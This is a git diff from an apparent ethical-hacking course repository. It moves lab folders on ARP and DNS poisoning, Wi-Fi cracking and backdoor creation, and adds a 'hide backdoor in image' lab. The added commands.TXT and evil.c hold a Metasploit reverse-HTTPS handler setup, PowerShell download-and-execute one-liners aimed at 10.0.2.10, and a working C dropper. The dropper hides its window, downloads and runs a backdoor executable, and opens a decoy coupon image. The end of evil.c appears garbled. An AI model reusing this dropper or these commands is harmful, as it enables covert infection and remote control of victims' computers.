diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_arpspoof/ARP_arpSpoof_tool_lab.pptx b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_arpspoof/ARP_arpSpoof_tool_lab.pptx similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_arpspoof/ARP_arpSpoof_tool_lab.pptx rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_arpspoof/ARP_arpSpoof_tool_lab.pptx diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_arpspoof/commands.TXT b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_arpspoof/commands.TXT similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_arpspoof/commands.TXT rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_arpspoof/commands.TXT diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_detection/Detecting_ARP_Poisoning_xarp_lab.pptx b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_detection/Detecting_ARP_Poisoning_xarp_lab.pptx similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_detection/Detecting_ARP_Poisoning_xarp_lab.pptx rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_detection/Detecting_ARP_Poisoning_xarp_lab.pptx diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_detection/commands.TXT b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_detection/commands.TXT similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_detection/commands.TXT rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_detection/commands.TXT diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_mitmf/ARP_mitmf_tool__screenshots_lab.pptx b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_mitmf/ARP_mitmf_tool__screenshots_lab.pptx similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_mitmf/ARP_mitmf_tool__screenshots_lab.pptx rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_mitmf/ARP_mitmf_tool__screenshots_lab.pptx diff --git a/EthicalHacking/Labs/MITMAttack/ARP_Poisoning_mitmf/commands.TXT b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_mitmf/commands.TXT similarity index 100% rename from EthicalHacking/Labs/MITMAttack/ARP_Poisoning_mitmf/commands.TXT rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/ARP_Poisoning_mitmf/commands.TXT diff --git a/EthicalHacking/Labs/MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx similarity index 100% rename from EthicalHacking/Labs/MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx diff --git a/EthicalHacking/Labs/MITMAttack/DNS_Poisoning/commands.TXT b/EthicalHacking/Labs/1_Attack_Networking/MITMAttack/DNS_Poisoning/commands.TXT similarity index 100% rename from EthicalHacking/Labs/MITMAttack/DNS_Poisoning/commands.TXT rename to EthicalHacking/Labs/1_Attack_Networking/MITMAttack/DNS_Poisoning/commands.TXT diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessPacketsSniffing/WirelessPacketsSniffing.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/PMKID_Cracking.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/commands.txt similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/commands.txt rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/commands.txt diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hash diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/hashtocrack diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID/mac.txt diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hash diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/hashtocrack diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/crack_PMKID_neighbor/mac.txt diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/reading/How to Hack Wi-Fi_ Cracking WPA2 Passwords Using the New PMKID Hashcat Attack.pdf diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessUsingPMKID/reading/New attack on WPA_WPA2 using PMKID.pdf diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/WEP_Cracking.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.cap diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.csv diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.csv diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking/basic_wep-01.kismet.netxml diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking_part2/WEP_Cracking_Force_Gene_Frames.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWEPCracking_part2/arp_wep-01.cap diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/WEP_Cracking.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/mypasswordlist.txt diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPA2Cracking/wpa_handshakes-01.cap diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPSCracking/WPS_Misconfig.pptx diff --git a/EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver b/EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPSCracking/reaver similarity index 100% rename from EthicalHacking/Labs/wirelessHacking/WirelessWPSCracking/reaver rename to EthicalHacking/Labs/1_Attack_Networking/wirelessHacking/WirelessWPSCracking/reaver diff --git a/EthicalHacking/Labs/2_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx b/EthicalHacking/Labs/2_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx new file mode 100644 index 0000000..008703c Binary files /dev/null and b/EthicalHacking/Labs/2_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx differ diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/Empire_Framework_commands.txt b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt similarity index 100% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/Empire_Framework_commands.txt rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/create_backdoor_Empire_lab.pptx b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx similarity index 100% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/create_backdoor_Empire_lab.pptx rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/emipire_http_8081.zip b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip similarity index 100% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_Empire/emipire_http_8081.zip rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt similarity index 100% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/Veil_Framework_commands.txt rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx similarity index 98% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx index 4e200af..4e46cb7 100644 Binary files a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/create_backdoor_Veil_lab.pptx and b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx differ diff --git a/EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/rev_https_8080.zip b/EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/rev_https_8080.zip similarity index 100% rename from EthicalHacking/Labs/HackingIntoPC/create_backdoor_veil/rev_https_8080.zip rename to EthicalHacking/Labs/2_Attack_Client/create_backdoor_veil/rev_https_8080.zip diff --git a/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx new file mode 100644 index 0000000..7a34029 Binary files /dev/null and b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx differ diff --git a/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx new file mode 100644 index 0000000..a9711bb Binary files /dev/null and b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx differ diff --git a/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/commands.TXT b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/commands.TXT new file mode 100644 index 0000000..457b42a --- /dev/null +++ b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/commands.TXT @@ -0,0 +1,77 @@ +https://www.dropbox.com/s/snby65gmwh92esj/amazon_coupon_code_Vl8_icon.ico +https://www.dropbox.com/s/gxh0ickzpr34t4o/amazon-coupon-code.jpg +https://www.dropbox.com/s/b01iqpmb9vfslrp/autoit-download-and-execute.au3 +https://www.dropbox.com/s/03cvti4wgu0dx0l/rev_https_8080.zip + +ls /root/.set/reports/powershell/ +mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt + +mv evil.exe /var/www/html/backdoor_image + +use multi/handler +set PAYLOAD windows/meterpreter/reverse_https +set LHOST 10.0.2.10 +set LPORT 8080 +exploit + + + + + + + + + + +Other useful commands + +powershell (new-object System.Net.WebClient).DownloadFile('http://www.xys.org/buttons/xys_cover.gif','C:\Users\IEUser\cover.gif') + +https://www.linkedin.com/pulse/go-hell-powershell-powerdown-attacks-kirtar-oza-cissp-cisa-ms-/ + +https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf + + powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\" + +"powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\"" + +powershell.exe "IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))" + +gcc evil_image.c -o evil_image.exe + + +char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe"; + +#include +#include +#include +int main() +{ +char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe"; +char url[200]=""; +char shellCMD[400]=""; +printf("URL of a backdoor: "); +//gets(str); + +strcat(url,"'"); +strcat(url,str); +strcat(url,"'"); + +printf(url); +printf("\n"); + +char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile("; +strcat(shellCMD,shellCMD_head); +strcat(shellCMD,url); +strcat(shellCMD,",\'C:\\Users\\Public\\screenshot.exe\')"); + +printf(shellCMD); +getchar(); + + +//system("powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\""); +//system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(url, 'C:\\Users\\Public\\screenshot.exe') "); +system(shellCMD); +system("powershell.exe start C:\\Users\\Public\\screenshot.exe"); +return 0; +} \ No newline at end of file diff --git a/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/evil.c b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/evil.c new file mode 100644 index 0000000..60449c8 --- /dev/null +++ b/EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/evil.c @@ -0,0 +1,101 @@ +#include +#include +#include + +/* +system("powershell.exe \"IEX( (new-object net.webclient).downloadstring +('http://10.0.2.10/payload.txt'))\""); +system("powershell.exe -w hidden -c (new-object System.Net.WebClient). +Downloadfile('http://10.0.2.10/payload.txt', 'C:\\Users\\Public\\screenshot.exe') "); +system("powershell.exe start C:\\Users\\Public\\backdoor.exe"); +system("powershell.exe start C:\\Users\\Public\\coupon.jpg"); +*/ + +void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc); +void powershellcmdRun(char * shellCMDRun, char * outputLoc); +char* insert_char_realloc (char *str, int len); + +int main() +{ + + +//You need to make changes here +char url_evil[200]="http://10.0.2.10/rev_https_8080.exe"; +char url_image[200]="http://10.0.2.10/amazon-coupon-code.jpg"; +//char url_evil[200]="https://pbs.twimg.com/profile_images/1057899591708753921/PSpUS-Hp_400x400.jpg"; //for test +//char url_image[200]="https://pbs.twimg.com/profile_images/54789364/JPG-logo-highres_400x400.jpg"; //for testing +char backdoorLoc[200]="C:\\Users\\Public\\backdoor.exe"; +char outputLoc_image[200]="C:\\Users\\Public\\coupon.jpg"; + + + +// ==================download backdoor +char shellCMD[400]=""; +powershellDownloadCmd(url_evil, shellCMD, backdoorLoc); +//printf("URL: %s\n", shellCMD); +system(shellCMD); + +//================== download image +char shellCMD_image[400]=""; +powershellDownloadCmd(url_image, shellCMD_image, outputLoc_image); +//printf("URL: %s\n", shellCMD_image); +system(shellCMD_image); + +//=============execute backdoor +char shellCMDRun[400]=""; +powershellcmdRun(shellCMDRun, insert_char_realloc (backdoorLoc, strlen(backdoorLoc))); +//printf("command: %s\n", shellCMDRun); +system(shellCMDRun); + +//=============open an image +char shellCMDRun_image[400]=""; +powershellcmdRun(shellCMDRun_image, insert_char_realloc (outputLoc_image, strlen(outputLoc_image))); +//printf("command: %s\n", shellCMDRun_image); +system(shellCMDRun_image); + +return 0; +} + +/* function returning a powershell command */ +void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc){ + char url_with_quote[200]=""; + strcat(url_with_quote,"'"); + strcat(url_with_quote,url); + strcat(url_with_quote,"'"); + + char loc_with_quote[200]=""; + strcat(loc_with_quote,",\'"); + strcat(loc_with_quote,outputLoc); + strcat(loc_with_quote,"\')"); + + + char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile("; + strcat(shellCMD,shellCMD_head); + strcat(shellCMD,url_with_quote); + strcat(shellCMD,loc_with_quote); +} + + +void powershellcmdRun(char * shellCMDRun, char * outputLoc){ + char shellCMD_head[400]="\"powershell.exe start "; + strcat(shellCMDRun,shellCMD_head); + strcat(shellCMDRun,outputLoc); + strcat(shellCMDRun,"\""); +} + +char* insert_char_realloc (char *str, int len){ +int i; +int j=0; +char * str_temp = (char *)malloc(len + 10); +for (i=0;iattacking server->remote login \ No newline at end of file diff --git a/FSCS727_Forensics/Labs/VM_Kali_Installation/Kali_Installation_Manual.pptx b/FSCS727_Forensics/Labs/VM_Kali_Installation/Kali_Installation_Manual.pptx index d3f7034..06e6b57 100644 Binary files a/FSCS727_Forensics/Labs/VM_Kali_Installation/Kali_Installation_Manual.pptx and b/FSCS727_Forensics/Labs/VM_Kali_Installation/Kali_Installation_Manual.pptx differ